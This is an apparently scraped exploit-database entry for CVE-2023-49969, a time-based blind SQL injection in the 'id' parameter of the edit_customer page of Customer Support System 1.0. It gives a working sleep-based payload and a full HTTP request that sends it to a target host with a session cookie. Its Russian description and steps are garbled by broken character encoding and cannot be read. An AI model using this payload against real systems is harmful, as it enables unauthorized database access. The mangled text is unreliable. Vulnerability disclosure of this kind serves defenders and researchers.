## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GERALDOALCANTARA-CVE-2023-49969
# CVE-2023-49969
# Customer Support System 1.0 β Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡΡ SQL-ΠΈΠ½ΡΠ΅ΠΊΡΠΈΠΈ Π² edit_customer ΡΠ΅ΡΠ΅Π· ΠΏΠ°ΡΠ°ΠΌΠ΅ΡΡ URL "id"
**ΠΠΏΠΈΡΠ°Π½ΠΈΠ΅** : Π Π²Π΅ΡΡΠΈΠΈ 1 ΡΠΈΡΡΠ΅ΠΌΡ ΠΏΠΎΠ΄Π΄Π΅ΡΠΆΠΊΠΈ ΠΊΠ»ΠΈΠ΅Π½ΡΠΎΠ² (Customer Support System) ΡΡΡΠ΅ΡΡΠ²ΡΠ΅Ρ ΡΡΠ·Π²ΠΈΠΌΠΎΡΡΡ SQL-ΠΈΠ½ΡΠ΅ΠΊΡΠΈΠΈ. ΠΠ»ΠΎΡΠΌΡΡΠ»Π΅Π½Π½ΠΈΠΊ ΠΌΠΎΠΆΠ΅Ρ Π²ΡΠΏΠΎΠ»Π½ΠΈΡΡ SQL-ΠΊΠΎΠΌΠ°Π½Π΄Ρ Π² Π±Π°Π·Π΅ Π΄Π°Π½Π½ΡΡ
MySQL, ΠΌΠ°Π½ΠΈΠΏΡΠ»ΠΈΡΡΡ ΠΏΠ°ΡΠ°ΠΌΠ΅ΡΡΠΎΠΌ URL 'id' ΠΏΡΠΈ ΡΠ΅Π΄Π°ΠΊΡΠΈΡΠΎΠ²Π°Π½ΠΈΠΈ ΠΊΠ»ΠΈΠ΅Π½ΡΠ°.
**Π£ΡΠ·Π²ΠΈΠΌΠ°Ρ Π²Π΅ΡΡΠΈΡ ΠΏΡΠΎΠ΄ΡΠΊΡΠ°** : Customer Support System 1.0
**ΠΠ²ΡΠΎΡ CVE** : Geraldo AlcΓ’ntara
**ΠΠ°ΡΠ°** : 28/11/2023
**ΠΠΎΠ΄ΡΠ²Π΅ΡΠΆΠ΄Π΅Π½ΠΎ** : 19/12/2023
**CVE** : CVE-2023-49969
**ΠΡΠΎΡΠ΅ΡΡΠΈΡΠΎΠ²Π°Π½ΠΎ Π½Π°** : Windows
### Π¨Π°Π³ΠΈ Π΄Π»Ρ Π²ΠΎΡΠΏΡΠΎΠΈΠ·Π²Π΅Π΄Π΅Π½ΠΈΡ:
1- ΠΠΎΠΉΠ΄ΠΈΡΠ΅ Π² ΠΏΡΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠ΅.
2- ΠΠ΅ΡΠ΅ΠΉΠ΄ΠΈΡΠ΅ Π½Π° ΡΡΡΠ°Π½ΠΈΡΡ customer_list, Π½Π°ΠΆΠΌΠΈΡΠ΅ ΠΊΠ½ΠΎΠΏΠΊΡ "Action" ΠΈ Π²ΡΠ±Π΅ΡΠΈΡΠ΅ "Edit".
3- ΠΡΠ΄Π΅Ρ ΠΏΠ΅ΡΠ΅Π΄Π°Π½ ΠΏΠ°ΡΠ°ΠΌΠ΅ΡΡ 'id', ΡΡΠΎ ΠΏΠΎΠ·Π²ΠΎΠ»ΡΠ΅Ρ Π²ΡΡΠ°Π²ΠΈΡΡ Π²ΡΠ΅Π΄ΠΎΠ½ΠΎΡΠ½ΡΡ Π½Π°Π³ΡΡΠ·ΠΊΡ.
**payload** : (select*from(select(sleep(5)))a)
### ΠΠ°ΠΏΡΠΎΡ
root@kitploit:~
GET /customer_support/index.php?page=edit_customer&id=(select*from(select(sleep(5)))a HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=customer_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n
Upgrade-Insecure-Requests: 1